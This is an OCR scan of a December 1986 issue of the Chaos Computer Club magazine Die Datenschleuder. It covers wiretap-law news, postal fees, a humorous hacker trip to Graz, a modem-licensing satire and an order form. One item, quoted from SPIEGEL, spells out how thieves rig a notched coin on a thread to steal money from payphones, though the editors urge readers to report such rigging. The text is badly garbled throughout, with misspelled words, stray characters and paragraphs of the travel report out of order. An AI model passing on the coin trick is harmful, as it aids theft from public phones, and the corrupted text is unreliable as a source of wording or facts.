nicht mit einer Stromversorgung, also Netz oder Bat¬
terie, verbunden und in Betrieb genommen werden.
Eine Besitzanzeige erübrigt sich, wenn derartige Sen¬
deanlagen vor dem 5. Januar 87 für dauernd (nicht
mit wenigen Handgriffen wieder einselzbar) un¬
brauchbar gemacht oder einem Berechtigten überlas¬
sen werden.
Nicht genug damit, daß man abgehört werden kann.
Nach der neuen gesetzlichen Regelung muß man da¬
für möglicherweise auch noch Strafe bezahlen: Wird
man ausspioniert, so werden einem dazu natürlich
eine oder mehrere Wanzen (staatlich genehmigte
nichlgenehmigie Sendeanlagen) in die Wohnung ge¬
setzt. Schon der Besitz derselben ist nun jedoch straf¬
bar. Man weiß zwar nichts von dem Besitz, aber Un¬
wissen schützt ja bekanntlich vor Strafe nicht.
LS23
MÜNZFERN-
SPRECHERTRICKS
Ein neuer Gauner-Trick macht der Bundespost zu
schaffen, berichtete der SPIEGEL in der Nummer 47.
Mil präparierten Fünf- Mark-Stücken plündern
Münzdiebe öffentliche Fernsprecher.
Der neueste Münztrick gehört nach Einschätzung
von Posiexpenen zum bislang “cleversten und ein¬
träglichsten Trick“ von Gaunern, die sich auf Tele¬
fonzellen spezialisiert haben.
„Der Trick ist so simpel wie erfolgreich: Ein Fünf-
Mark-Sfück wird am Rand an zwei Stellen leicht ein-
gekerbt und an einem Faden * bevorzugt reißfestes,
aber feines Blumenband - gebunden. Die präparierte
Münze wird dann wie gewöhnliches Geld in den
Münzkanal geworfen, aber nach einer bestimmten
Zahl von Zeniimeiern durch den Faden gestoppt, der
zuvor hinter dem Geldschlitz festgedrücki wurde -
vorzugsweise mit Kaugummi.“ Die Manipulation ist
von aussen nur schwer erkennbar. Das Geldstück
baumelt kurz vor der Lichtschranke, die jeden Gel¬
deinwurf registriert. Alle folgend eingeworfenen
Fünfcr(maximal 10) bleiben.dort hängen und können
durch lösen des Fadens abkassiert werden.
Der nahezu als betrugssicher geltende Telephonau¬
tomat Typ 21 der bundesweit in 53 000 Fünf-Mark-
Fernsprechern eingebaut ist, wird laut FTZ nicht in¬
nerhalb von zwei Jahren ersetzt werden können. Um
den Münzdieben auf die Spur zu kommen, setzen
Post und Polizei in etlichen Großstädten — mit mä¬
ßigem Erfolg — bereits Sondertrupps ein.
Die Redaktion empfiehlt Datenreisenden, die in öf¬
fentlichen Fernsprechern derartige Manipulationen
aufdecken, sofort den Störungsdienst der Post anzu¬
rufen. Dem dann anreisenden Stördienst ist die Ma¬
nipulation anzuzeigen, sowie der Geldbetrag als
Fundsache/Eigeneinwurf quittieren zu las.sen. Sol¬
ches Vorgehen befreit vom Tatverdacht, der durch
eventuelle Wahrnehmung des Fundes unterstellt
werden könnte. Bei Komplikationen bittet die Redak¬
tion um Information.
LS23
Gummiertes Fest
Wie in jedem Jahr laufen Weihnacht.swunschbriefe
aus allen Teilen der Bundesrepublik in 2167 Him¬
melpforten ein. In einer Gemeinschaftsakiion des
Postamtes, der Gemeinde Himmelpforten und des
Weinachtsmanns werden alle eingehenden Sendun¬
gen mit einem Schreiben beantwortet. „Oh,Oh,Oh!
Mir wird schon schwummerig, wenn ich die großen
Stapel Wunschbriefe hinter mir sehe“, stöhnt dort der
Weinachtsmann. Ohne die Hilfe der Erdenpost wür¬
den er und das Christkind verzweifeln. Zum Glück
hat er tüchtige und fleißige Helfer. So bleibt ihm nur
noch, die Briefmarken auf den Antworlbriefen mit
einem (s. Abbildung) weihnachtlichen Stempel zu
entwerten.
LS23
Grünliche Compulerstudie
Erste Wöhlperiode abgeschlossen
„Die Einführung der Computertechnik gestaltet sich
für die Grünen im Bundestag so schwer wie für ande¬
re der Ausstieg aus der Atomindustrie. Für beide geht
es an die Strukturen“, beginnt eine Studie über die
„Computerisierung der Fraktion“ (PARLAKOM),
die gemeinsam von CCC/APOC (Arbeitskreis politi¬
scher Computereinsatz) und deren Freundinnen als
Hilfestellung auf dem Weg zu einer fundierten Post¬
politik erstellt wurde.
„Hisrisch geht es seit Herrschafis Zeiten um die Kon¬
trolle des fortgeschrittensten Mediums. Politisch um
informationeile Selbstbestimmung. Kulturell um die
Entwicklung von Netzwerken, netzgemäßem Denken
und Handeln. Wirtschaftlich muß eine dezentrale
Netztechnologie entwickelt werden.“
Die endgültige Genehmigung zur Veröffentlichung
der Studie von gut 50 Seiten Umfang wird derzeit von
der Bundestagsverwaltung bearbeitet. Der Verkauf¬
spreis wird zwischen DM 6,66 und 7,50 liegen. Ask
Your Local Dealer eise CCC. Gosub Next Artikel.
Is5
Neue Gebühren
Datex-Pwird teuer
„Der Verwallungsrat der Deutschen Bundespost hat
der von Rostminister Schwarz-Schilling vorgelcgten
29. Verordnung zur Änderung der Fernmeldeord¬
nung zugestimmt. Diese Verordnung enthält neben
Gebührensenkungen von im Saldo 330 Millionen
DM jährlich.. .“,so beginnt eine Presseerklärung der
OberPostDirektion Hamburg. Neben den Gebühren¬
senkungen für Tastentelefone (die werden für intelli¬
gente Netze der Post gebraucht und müßten sowieso
ausgetauscht werden) versteckt sich eine entschei¬
dende Änderung im Daiex-P-Verkehr.
„Für den Zugang aus dem öffentlichen Fernsprech¬
netz zu Endeinrichiungen im öffentlichen Datex-P-
Netz werden die entfernungsabhängigen Zugangsge¬
bühren am l. April 1987 (scherzlos) durch entfer¬
nungsunabhängige Gebühren ersetzt. Dadurch wer¬
den Standorinachteile ausgeglichen.“
Die Pressestelle des Roslminisieriums erläuterte die
Maßnahme: Das Datc.x-P-Netz hätte nur einen klei¬
nen Teilnehmerkreis, der über das Fernsprechnetz
zugreift. Die Gebührenänderung würde nur wenige
betreffen und den meisten Vorteile verschaffen. Ge¬
plant ist ein Zcittakt von 50 Sekunden am Tag und 75
in der Nacht.
Für Nutzer aus Orten, in denen bisher Datex-P zum
Ortstarif erreichbar ist, entstehen über neunmal so
hohe Fernsprechgebühren. Nutzer aus der Fernebene
sparen nur wenig und zahlen im Nachttarif oft drauf.
Bildschirmtext, die „Wunschmaschine“ (so das Bun¬
desrostministerium) fürs Volk ist bundesweit zum
Orts-oder Nahtarif zu erreichen. Die Post fördert den
falschen Dienst.
Btx ist ein System, bei dem Zentraje und Endgeräle
nicht sonderlich intelligent sind. Über die zukunft¬
strächtigen Datennetze wie Datex dagegen lassen
sich relativ einfach beliebig viele intelligente Systeme
koppeln.
Intelligente Netze und Kommunikalionssysteme auf
der Datex-P Übertragungsebene bleiben durch diese
Gebührenslruktur weiterhin vielen aus Kostengrün¬
den verschlossen.
]s23
DitenscbleuderS
Datensebkuder 9
ENTWICKLUNGSHILFE
Chaos-Dienstreise nach Graz
Eines Tages wurde uns durch den Besuch des Vorsitzenden der
Studentenschaft der Technischen Universität Graz bekannt,
daß die TU Graz anläßlich ihres 175-jährigen Bestehens eine
Veranstaltung mit dem Titel „TECfWIK FEIERN“ geplant
hatte, da es ja zu langweilig wäre, ständig maschinenstiir-
merisch auf die TechniS zu schimpfen, und man ja nun endlich
einmal einen Kontrast dazu schaffen müsse. Das Schaffen
eines Kontrastes ist den Organisatwen zumindest mit ihrem
Ankündigungsplakai gelungen: Rote Schrift auf grtnem
Grund, Wir bekamen nctterweisc eines dieser kontrastreichen
Plakate überreicht, worauf zu lesen war, daß der Chaos-
Computer-CIub aus Hamburg bei der Veranstaltung mitwir-
ken würde. Der Veranstalter teilte uns mit, daß man nunmehr
nicht mehr auf uns verzichten könne, da unser Vortrag bereits
durch Verbalpropaganda als der„Hammei*‘ angekündigt wor¬
den sei. Wir beschlossen, uns den Tatsachen zu fügen und uns
für den „Tag X“ in Köln zu verabreden, da dort etwa zeiigleich
die Orgatechnik- Messe siaitfand. die ohnehin besucht werden
mußte. Ähnlich geschah es auch wenig später in Köln. Wir
trafen uns nach einigen orgatechnischen Problemen tatsäch¬
lich auf der Messe und begaben uns nach dem einen oder
anderen, nebenbei bemerkt, recht erfrischenden Kölsch und
einer guibtirgCTlichen Mahlzeit mit etwa zwanzig Hackern aus
rund vier Bundesländern, in Clinch*s Chaos-Mobil, welches
den Antritt der Reise schon dadurch erheblich vereinfachte,
daß es sofort ansprang.
der Ungleichungsformel ER-AS=0 verhieUen. ln Graz er¬
hellten sich die Straßen wieder, doch das beleuchtete unsere
Vorstellung vom genauen Ziel nur unwesentlich. Nicht zuletzt
deshalb sah sich unser Amateurfunker genötigt, seinesglei¬
chen in der Fremde zu suchen. Glücklicherweise gibt es auch
in Graz einige wenige amateurfunkende Spätaufsteher. Ama¬
teurfunker sind eine ganz seltsame Sone Mensch. Erst be¬
werfen sie sich eifrig mit Q-Gruppen und Rufzeichen, um
danach vergessen zu haben, was sie eigentlich sagen wollten.
Da braucht selbst BettNelt, obwohl von HAL, wenigerOver-
head. Wir fragten also die freundlichen Funker. wo*s denn zur
TU gehe. Sofort entbrannte eine heiße Diskussion zwischen
den Lokalamateuren, wo wir uns wohl befänden und was wohl
der geeignetste Weg dorthin wäre. Unserem Mobilfunker
gelang es nichtseinen Ein-Watt-Phallus dazwischcnzuhalicn,
und so begab es sich, daß wir uns schon längst nicht mehr an
der spekulativ ermittelten Stelle befanden.
Unser Mobilfunker hatte auch nicht gerade die Gabe, sich
besonders präzise auseudnicken. Er gab den Lokalfunker so
aussagekräftige Hinweise wie etwa „Ai^der rechten Stra¬
ßenseite sehe ich ein Vorfahrtschild" oder „Direkt hinter uns
fahrt ein roter Käfer, und zwar genau in Decklinie mit einem
mittelgroßen Haus". Die Antwort (nach eingehender Dis¬
kussion natürlich) fiel etwa ähnlich informativaus: „Wennlhr
die Straßenbahnschienen seht, müßt ihr sofort halb-rechts
Wären wirdieserAuskunflgefolgl, hätten wiruns
wohl in Wien wiedergefunden, da in Österreich bekanntlich
alle Wege nach Wien führen - früher oder später. Das Gelände
der Uni war Grunde unverfehlbar, da Graz zu einem
ungewöhnlich hohen Prozentsatz aus Universität besteht, so
verfehlten auch wir es nicht Wir fuhren die Auffahrt hinauf
zum großen Portal. An dem Tor war ein Zettel angehefiet auf
dem in Caps-Lock drei riesige C’s zu sehen waren. Der
inliegende Text wies aus. daß der Organisator im Restaurant
JLaufke“ zu finden sei. Es kostete uns nur zwanzig Minuten,
das zwei Straßen weiter gelegene Restaurant aufzusuchen,
welches ohne jeden Zweifel in der La^e war. uns für jeglichen
Mangel des Zielgebietes zu entschädigen. Das beschriebene
Restaurant ist eine gastronomische Oase am Rande des Um-
versums. Man kann bequem dem Weltuntergang entgegen-
sehen. Die erste Nacht, die nun über die Stadt hercingebrochen
war, verbrachten wir in unterschiedlich komfortabel ausge¬
statteten Unterkünften. Zwei ppl. bei einem Architekturp^-
sten,der Letztein einer Mädchen-WO. Ich selbst schloß mich
ersicrer Möglichkeit an, da diese gesicherte Nachtruhe zu
ve^rechen schien. Der folgende Tag meldete ach vorsichtig
mit einem laserarügen Sonnenstrahl von höchstens zwei Mil-
Üwalt Leistung und einem vorzüglichen, unverlängerten tür¬
kischen K^fee an. An der TU standen zwar ein paar VAXen
im Glaskasten, ein Telefon zu finden, jedoch, war ein aus¬
sichtsloses Unterfangen. Der freundliche Organisator war
stets bereit, uns jede nur erdenkliche Hilfestellung angedeihen
zu lassen, so machte er sich auf den Weg ein Telefon zu
besorgen. Ich muß gestehen, daß ich ein wenig entsetzt drein¬
geschaut haben muß, als er zurückkehrte. Er überreichte mir
freudestrahlend einen FemsprechapparaL „Hier hast du ein
Telefon ", sagte er in erhebender Tonlage. ^ gelang uns. ihm
zu erklären, daß Wasserhähne, um Wasser zu speien, an eine
Wasserleitung angeschlossen werden müssen, und es sich mit
Telefonen nicht wesentlich anders verhalte, mildem dnzigen,
feinen Unterschied, daß in diesem speziellen Falle eine Was¬
serleitung nicht helfe. Dieses Problem sollte sich erst später,
ca. 5 Minuten vor Beginn des Vortrags, klären. Ich rief dann
^teinmal Post an. um die Telefonnummer für den Grazer
Datex-P Vermittlungsrechner zu erfragen. Man informierte
mich postwendend, daß der Telefonzugang für Daicx-P ge¬
plant, Uber den Beginn der Arbeiten jedoch noch nichts be¬
kanntsei. Ich mußte erneut schlucken. Das also war derGrund
für die unangemessen schwache Vertrciung Österreichs in der
Networker Crew. Glücklicherweise halte eine derUni-V AXen
einen Datex-PIO Hauptanschluß und die SysOps der VAXen
waren SEHR KOOPERATIV (lü). Leider hat das Packet
Switching Interface (PSI) unter dem dort laufenden VMS 4.1
noch eine kleine Macke, so daß ich unabsichtlich die
DECNET-links zwischen den Nodes „RECH; und
„STG: :** - unwiderruflich bis zum nächsten re-boot beider
Maschinen - in den Wald geschickt halte. Wiebereils erwähnt,
kam in letzter Sekunde die rettende Idee. Wir schraubten das
einzige voll amtsberechtigte Vierteltelefoh im Erdgeschoß
auseinander, klebten die ungleichen Sprech- bzw. Hörkapseln
mit denen eines Hausielefonanapparates zusarnmen und stell¬
ten cinwi Mann für die Aufgabe des Wählens im Erdgeschoß
ab. Im Hörsaal Sechs, in den die Veranstaltung verlegt worden
war, da dort der einzige Terminalanschluß möglich war, gab
es murphylogischerweise keinen Haustelefonanschluß. Ge¬
nerell war in Graz die technische Ausstattung für eine tech¬
nische Universität eher dürftig. So mußte die Veranstaltung
erneut umziehen - In die Aula, wie eingangs geplant Der
Computer, der auch nur durch das Ausleihen einerCGA-Karte
im wtrfil einzigen Compi-Shop von Graz dazu überredet wct-
den konnte, auf dem Video-Bcam sinvoUe Zeichen abzubil¬
den, sowie der Großbildprojektor selbst, mußte mit vereinten
Kräften in den ersten Stock getragen werden, wo mein mit¬
gebrachtes Schlabbeiphon an einem Hausielefonhörer lauerte.
Der im Erdgeschoß abgestellie Mann wählte den hamburger
PAD an und siche da, der halte nichts dagegen, uns die große
weite Daienweli zu offenbaren. Wir ließen also den üblichen
Senf vcMi Vernetzung, Technik, Post, Fun und so ab, pilgerten
über die lange Leitung nach CERN, dem Mekka der Hacker,
und demonstrierten dort noch ein bi^hen BetlNetl. Der Vor¬
trag selbst verlief recht ordentlich, wie mir schien. Ich selbst
An diesem Punkt wäre vielleicht zu bemerken, daß dieses für
eine derartige Reise recht bemerkenswert ausgestaoei ist. Es
blitzt nicht nur Sitze für Fahrer und Beifahrer sowie zwei
weitere Personen der technologischen Zukunft, sondern auch
ein eingebautes Digiialvolimeter, diverse Antennen und eine
gut zugreifbare Oerätesteckdose für TV, Amateurfunkgeräte
um!'optionales digital equipment (Un). Eine zweifarbige
Leuchtdiodezeigtstetsden Betriebszustand efer Aggregate an,
deren Nachrichten zu verstehen, ich jedoch mangels ausrei¬
chender Morsekenntnisse, nicht in der Lage war. Es vergingen
einige Minuten Fahrzeit bis wir in München eintrafen um uns
einQuartier fürdieNacht zu suchen. Mil freundlicher Hilfe der
Kollegen von der B.HP. ließ sich relativ schnell eine kom¬
fortable Übernachtungsstätte in einem Rehabilitaiionszen«
trum am Rande der Stadt ausfindig machen. Am nächsten
Morgen gerieten wir aufgrund bisher ungeklärter Ursache
erneut auf die Autobahn, die uns ohne Umwege an die Öster¬
reichische Grenze leitete. Nun wurde vieles anders. Das Essen
auf den Raststätten wurde deutlich besser, auch der Geldsack
konnte sich etwas von den kölner Strapazen erholen. Die
primäre Euphixie wurde jedoch schon nach wenigen K metem
durch den Ärger über cüe Straßenverhältnisse kompensiert.
Außer einem Vergrauten Verkehrsschild ließ kaum noch et¬
was darauf schließen, daß wir uns auf einer Autobahn be¬
fanden. Der Äb^gang zwischen Autobahn und Kiautacker
wurde durch regen Regen zunehmend fließonder. Die erste
Begegnung mit derZivilisation des Zielgebietes hatten wir auf
einer AutobahnrasisiättecaSOK meier vor Graz. Don kämpf¬
te eine ganze Armee Österreicher mit einer nicht zu öffnenden
Kaffeemühle. Sie hatten die Maschine mittels eines Vorhän-
g^hlosses gegen den Zugriff unauthorisiMter Wesen zu
sichern gesucht, was unweigerlich dazu führen mußte, daß die
Sicherungen den authorisierten Benutzern den Zugriff ver-
spenrten. Ich halte cs für höchst zweifelhaft, anzunehmen, daß
sich ein unauthorisierter Benutzer durch eine derartige Si¬
cherung von seinem Vorhaben hätte abbringen lassen.
Mittlerweile hatte sich d^ Wasserstand im Chaos-Mobil de¬
rart dramatisch erhöht, daß eine Gefährdung der technischen
Einrichtungen nicht mehr auszuschließen gewesen wäre,
wenn wir nicht den Unterboden mit einem Loch versehen
hätten. Mit der üblichen Präzision durchschlugen wir den
Fahrzeugboden mittels eines Spczialwerkzeuges (CCC ge¬
nuine pari No. 1254A^SM), so daß einfließendes Regenwasser
(ER) und ausfließendes Schmutzwasser (AS) sich exakt nach
verlor nur zweimal den Faden und drehte nur eine einzige
Schleife in meinem Konzept. Auch der Veranstalter zeigte sich
zufrieden. Nach dem Vortrag giftete noch irgendein konser¬
vativer Zwerg aus d^ Reihe mitte rechts, daß das doch aber
alles illegal und destruktiv sei, konnte sich aber mit dieser
Ansicht nicht durchsetzen. Ein erfreulicheres Erlebnis
war da schon, einige alte Bekannte zu Gesick zu bekommen:
die ausgesprochen nette, durch Zweiradfahrt etwas durch¬
gefrorene Schwester unseres Chefredakteurs und desselben
Mitbewohner eines hamburger Appartements. Auf der Rück¬
fahrt waren uns Österreichs Wettergötter erheblich wohlge¬
sonnener, wodurch wir eine etwas wohlbesonniere Heimkehr
betreiben konnten. Nach dem obligatorischen Überfall der
Straßenräuber (Mautgeldjäger) trafen wir erneut in München
ein. Dort plauderten wir nachmittags noch etwas mit dem
Boxmanager, JCR“ v<mi Markt & Technik, versuchten unseren
Greuel einzufangen, stießen dabei nur auf eine verschlafene
Hackersfrau, und mußten die Stadl doch unverrichteter Dinge
verlassen. Pünktlich um sieben Uhr morgens konnte unser
Chaospostler Clinch wieder seinen Dienst bei der Bundespest
in Hamburg anrreien.
Vic.
Datenscbleuder 10
Datenschleuder 11
Axel Schaefer 13SC
Postmodemballade
Ein postmodernes Melodram
..Es begab sich aber zu dieser Zeit, dc^ ein Gebot ausging von
dem Postminister, daß alle Modems amtens abgeschätzet
werden ."
So h^ie der Chronist die Tatsache beschrieben, daß Zusat-
zeinrichtungen zur Dalcnfcmübertragung, kurz MoDems ge¬
nannt, der Zulassung durch das Fernmeldetechnische Zen¬
tralamt (FTZ) in Darmsiadi bedürfen. Keinesfalls darf man
bekanntlich Geräte ohne Zulassungsnummer, oder gar - ein
Frevel - selbstgetflpfene Konstruktionen a la Daterudo ohne
den Segen der Pose an das Femmeldeneu anschließen. Das
führt, so man Besitzer eines Computers ist, dem die Post nicht
die selig machende 'allgemeine Zulassung erteilt hat, oft zu
abenteuerlichen Eigenbauien (A£). Diese A£ umgehen die
postalischen Bestimmungen einfach dadurch, daß sie den
Einfallsreichtum der Verfasser der Femmeldeordnung über¬
treffen und somit in derselben gar nicht erwähnt werden.
Wir denken hier vor allem an cüe letzthin beschriebene „Kat¬
ze“, die rein mechanisch das Abheben des Telefons besorgt.
Ein solches Gerät hat den Vorteil, daß m^ damit relativ
ruhigen Gewissens auch auf einem C 64 eine Mailbox bc-
Ereilen kann. Mit dem Nachweis, daß eine solche ,JCatze“
nicht den Vorschriften entspricht, tut die Post sich ziemlich
schwer. Beharrlichkeit führt hier oft zum Ziel, denn die „Kat¬
ze“ ist so konstruiert, daß sie eben und eben nicht in der
Femmeldeordnung verboten wird.
Hat man sich irgendwann dazu aufgerafft, einen neuen Rech¬
ner nach dem von Incredibly Bad Machines gesetzten Stan¬
dard zu erwerben, denkt man beim Kau f natürlich auch daran,
daß viele dieser Geräte eine FTZ>Nummer (amtlichen
Automaten-Taufschein) haben und gibt dankbarein paar Mark
mehr dafür aus. Endlich darf man mit dem Segen der Post ein
Modem betreiben. AIÄ) auch seine Mailbox endlich auf den
Boden der FDCO stellen, sprich legal arbeiten. Und wenn man
grade so schön am Planen ist, kommen einem auch die wun-
dervoUen Möglichkeiten des Datex-Dienstes der Post in den
Sinn.
Also wird ein Antrag beantragt. Kaum zehn Tage später, sagen
wir Anfang Mai, kommt Post von der Post Anträge für
Modems und für Datex-P-Haupianschlüsse. und eine Liste der
verfügbaren Modems. Nun, man weiß sowieso, was man will,
Modems zu 12(X) und 3(X) Baud, umschaltbar, und dann noch
ein f^uptanschlüsschen für Datex-P20. Und ab die Post
Die Wochen ziehen ins Land Nichts rührt sich. Irgendwann
(f ann ein Annif von der Anmeldestelle: „Sie haben hier einen
Antrag auf einen Datex-HauptanscMuß gestellt. Wollen Sie
das wirklich, oder wollen Sie nur eine Softwarekennung?'“
Messerscharf geschlossen -- der Mann meint ’ne NUI. Aber
sowas ham wer doch schon. Wir setzen dem Herrn ausein¬
ander, daß wir tatsächlich das h^n wollen, was wir bestellt
haben. Damit ist dann vorerst wieder Ruhe.
Es ist Juli geworden. Die Mailbox läuft mittlerweile auf dem
PC, allerdings immer noch mit der eigenwilligen Abhebe¬
mechanik. Die Post scheint ab und zu noch ein paar Rückfragen
zu haben, erkundigt sich, welche Modems man denn nun gern
hätte und erhält bestätigt, daß man tatsächlich an den be¬
stellten Geräten festhäJt. Man liefert eine Kurzbeschreibung
der „Katze“, daraufhin Schweigen am anderen Ende der Lei¬
tung, dann ein unfrohes „Naja".
Keine drei Wochen darauf ein weiterer Anruf: „Mein Kollege
hat Ihnen doch schon vor zwei Wochen gesagt, Sie sollen Ihr
Modem abklemmen usf..." Der Versuch, auch diesem Herrn
klarzumachen, daß man kein Modem b^utzt. sondern einen
zugelassenen Koppler, scheitert an dessen Selbst^wußtsein.
„Nehmen Sie das Ding ab oder Sie haben morgen früh die
Betriebssicherung im Haus. Die Modems kriegen Sie dann
Anfang August. “
Betrübt steckt man seine ..Katze*' ins Körbchen und sieUt den
Boxbetrieb ein. Ist ja nur für ein paar Tage. Auf der Datex-Seiie
regt sich plötzlich auch was: Im Briefkasten ein Kärtchen mit
der Bitte, den Baubezirk anzurufen. Ein Teilwunder geschichc
Milte Juli werden die Strippen für den Anschluß gelegt. Von
den dazu benötigten Modems keine Spur. Dafür am nächsten
Tag ein Brief mit. kßnnen wir Ihnen keine AnscMußge-
nehmigung erteilen...“ Zwischenzeitlich gelingt es dem An¬
tragsteller, den schriftlichen Nachweis zu erbringen, daß er in
der Lage ist, seinen eigenen Computer auch selbst zu unter¬
halten wie es die Bestimmungen arfordem.
Die Tage ziehen ins Land, bis Anfang August die langer¬
sehnten Auftragsbestätigungen für die Femsprechmodems
eintrudcln. Voraussichtlicher AnschluGtermin: 12. August
Das nächsieTeilwundcn Auch die Anschlußgenchmigung für
Datex-P kommt an. Es folgt Stille bis zum 11. August, an dem
der Antragsteller bei der Rückkehr von der anständigen Arbeit
eine Karte im Kasten vorfindct. Offenbar waren me Herren
vom Baubezirk morgens dagewesen. Baubezirk annifen.
neuen Termin vereinbaren. Und siehe da: die Strippen werden
gezogen, Anschlußdosen gesetzt - und das wars schon wieder.
Nochmal Baubezirk annifen. „Damit ham wir nichts zu tun,
das is ‘ne andere Dienststelle..." Die zuständige Dienststelle
konstatiert neuen Sand im Getriebe: „Die Kollegen haben bei
Ihnen ADo8 gesetzt (das sind die alten Dosen mit 8 Kontak¬
ten). Für Ihre Modems brauchen Sie aber TeAeö (äassi^die,
mit denen zJ. das DBT03 angeschlossen wird), das mt0 erst
noch geändert werden.“ Wie auch anders,
Baub^irkanrufenTerminvereinbaren. Nachdem die Dosen
ausgewechselt sind: Anruf beim Fernmeldeamt 4, nachhaken
in der Modemfiage. Doch da sei die Post vor, es fehlen ja noch
die Daientelefone. Die bringt wieder eine andere Dienststelle.
Nach einer Safari durch den Posidienstsiellendschungel kom¬
men auch die Datentelefone angekrochen. Man beginnt der
Ansicht zuzuneigen, daß unter den Urahnen der Postbeam-
lenschafi zwar nicht der Erfinder des Rads zu finden ist,
möglicherweise aber der Erfinder der Bremse.
Am 10. Septembo* hebt sich der Vorhang zum vorerst letzten
Akt des Melodrams: Die Modems werden angeschlossen.
Dabei stellt sich heraus, daß die Daientaste an den Telefonen
nicht funktioniert, was man aber als Nebensache hinnimmt.
Schließlich hat jedes Modem nocheine eigene Datentaste,und
man will ja eh hauptsächlich ankommende Rufe beanswem.
In aller Ruhe werden noch zwei V24-Kabel zusammenge-
braten. Fünf Monate nach Antragstellung, und zwei Monate
nach Beginn der Zwangspause, kann die Box wieder online
gehen. Der einzige Unterschied zwischen dem alten Betrieb
vermittels „Katze“ und dem neuen mit Posünodem; ICO DM.
Soviel kosten die Modems pro Monat
Achja, der Datex-Anschluß. Er wurde bislang noch nicht
funktionsfähig übergeben. Aber wir haben ja erst Ende Sep¬
tember.
gohlin
automatischer Saucenumbruch am Schüsselrand
144 verschiedene Gewürzarten und unterstrichener Genuß
Implementierte Schnittstelle zur Beilagenverarbeitung
(INTERFRESS)
zwanzig Kräutertasten frei definierbar
frei definierbare Fruchtsequenzen für Obstsalate
selbstregenerierbare Schnitzelsätze
Proportionaldekoration auf Tellern mit Schnitzelsatzdownload
zum Beispiel OKIGäGä, YAHAMMm und Hausknecht.
Farbdarstellung auf Gabelmatrixgeräten, EAT-CHAT'S und
Mikrowellenprintern.
Erstellung von Kühldateien für Picknick und Camping
Auto-Scratch bei überschrittenem Haltbarkeitsdatum
Saftwäre:
1-2-drv
QuartalsaufProgramm
Übertragung seriell oder über Breittrinkkabel
mehrbenutzerfähig durch Kanalsharing
grafikfähig, 3D-Promiiieanzeige
Gröhlgenerator
- verschiedene grafische Ausnüchterungsmuster
Trink Tank:
Tea Base I
multitassing teatimesharing
verschiedene Teezeremonien einprogrammiert
datenkompatibel zu SAMOWAR-STAR vom VEB Subitnik.
integriertes Wasserprüfprogramm
Sortenautomatik Earls Cray mit beschleunigtem Regalzugriff
Mischroutine Darjee-Liiik
selbst anpassender Kochprozessor HOT-1
zukunftssicher durch Gasbetrieb
Datex-T Fernwärmeadapter
Diitnachltaia 12
Dateoschleuder 13
Chaos Computer Club Bestellfetzen
Tahrerkzeug Computer
Erinnerungen an die Zukunft
Hiermit bestelle ich folgende(s) an unerfüll- und (un)verpackbaren Sachen:
von Ernst Schnarrenberger
Moewig Sachtaschenbuch DM 9.80
ISBN 3-8118-3210-7
„Krimi“ schrie mir ein Chaot entgegen, nachdem er
die ersten Seiten dieses Buchs gelesen hatte.
Leider hat er recht. Nach dem Prinzip „Quellenange-
ben, was ist das ?“ schildern die Autoren einige Fälle
von Computerkriminalität, unter anderem auch den
Hacking-Fall eines Dipl.Ing. Dabei vergaßen sie je¬
doch fast immer, ihre Quellen zu dokumentieren. Nur
in einigen wenigen Fällen rafften sie sich dazu auf,
außer dem Zeitungsnamen auch das Datum oder die
Ausgabennummer bekannt zu geben. Da nichts wirk¬
lich drinsteht, außer daß die BHP zur Kultzeitung er¬
hoben wird, verschwendetes Geld.
Ls 4007
..Positronische Systeme sind unfehlbar. Sie können
sich selbst kontrollieren. Sie erkennen jeden unbefug¬
ten Eingriff“
„So hat man es uns in den Schulen gelehrt“, über¬
nahm Folly das Wort. „Wir Byte-Jäger wollen versu¬
chen, das Gegenteil zu beweisen. Wir haben viele
Vorbilder in der Vergangenheit. Eines davon stammt
aus dem Dezember des Jahres 1984 der alten Zei¬
trechnung. Da hat eine Gruppe junger Burschen aus
einer terranischen Stadt namens Hamburg das da¬
mals jüngst eingeführte BTX-System der Post gek¬
nackt und ist in unzugängliche Bankdatenverbindun¬
gen eingebrochen. Aus Jux haben diese Burschen
dort eine halbe Milchstraße auf ihr Konto umge-
buchl.“
(aus: Peter Griese, „Positronicspiele“, in Perry Rho¬
dan Jubiläumsbarid 6, Moewig Verlag 1985, ISBN 3-
8118-7096-3)
Computer-Teile ein ^
LIebeszelciiani ^
• Wenn die Frou den Mann mH
Hobelbank, Computer-lu-
lOlitellen oder anderen Dln-
oen fürs Hobby Überrascht:
klarer Fall von Uebel (74 Pro¬
zent der deutschen Frauen
sind ndmllch eifersüchtig out
SEIN Steckenpferd.
e
-a
Di« Datenschleuder 17
Dezember 1986
Das Wisseasehaftliche FachbUtt
fuer Datenreisende
D-2(]00 Hamburg 20 — Schwenckestrasse 86
Geenet: Geel: Chaos-Team
Btx: »»»»dSSSZl #
C.LI.N.C.H.: 040 6323517
Herausgeber und ViSdPG:
Herwart Holland-Moritz
Mitarbeiter dieser Ausgabe (u.a.): R.Schrutzki.
A.Eichler. P.Franck, H.Cmei, M.Kuebn.,
S.Stahl, CHW, epi/2, CMüller.T.Unge,
Andy M.-M., S.Wemery, Poetronic
Datenschleuder 14
cccvw
20,00
DM _
cccf 1
230,00
DM
cccnl
120,00
DM
.
cccsl
60,00
DM _
dspe
2,50
DM
_ dsfl
100,00
DM
dsnl
60,00
DM
.
dssl
30,00
DM _
_ dshl
35,00
DM _
dsklO
3,33
DM
dsabh
3,33
DM _
pvt
??? ??
DM
Total
Einmalige Rufnahmegebühr
mehr erwünscht... Förderndes Mitglied
normales Mitglied (für 1 Jahr)
Schüler, Studenten oder Ähnliches (1 Jahr)
Probeexemplar der Datenschleuder
Förderabo der DS (mehr Geld erwünscht...)
Standard-Jahresabo der DS
Sozlalabo der DS für Schüler oder Ähnliches
Die Hackerbibel (Teil 1) incl. Porto usw.
10 Kleber "Kabelsalat ist gesund"
64 Kleber "Achtung Abhörgefahr"
(A4 Bogen spritzwassergeschützt)
Porto, Trinkgeld usw. für den Rest...
bei 2 Stellen (vor Komma) gehts schneller
das Geld liegt bei als _ Scheck
_ Briefmarken _ Bargeld
Nur für zukünftige Mitglieder;
Ich zahle meine Mitgliedsbelträge
Zutreffendes bitte ankreuzen
Vierteljährlich _ per Scheck _ Bar
Halbjährlich _ per Überweisung auf Postgiro Hrab 5990 90-201
Jährlich _ Einzugsermächtigung
Hur für zukünftige Mailbox-Benutzer:
Ich möchte teilnehmen an der
Zutreffendes bitte ankreuzen. Unterlagen werden zugeachiekt.
Infex Mailbox (20,00 DM Eintragungsgebühr + 8,00 DM/Monat Mindest¬
nutzung + anfallende Nutzungsgebühren)
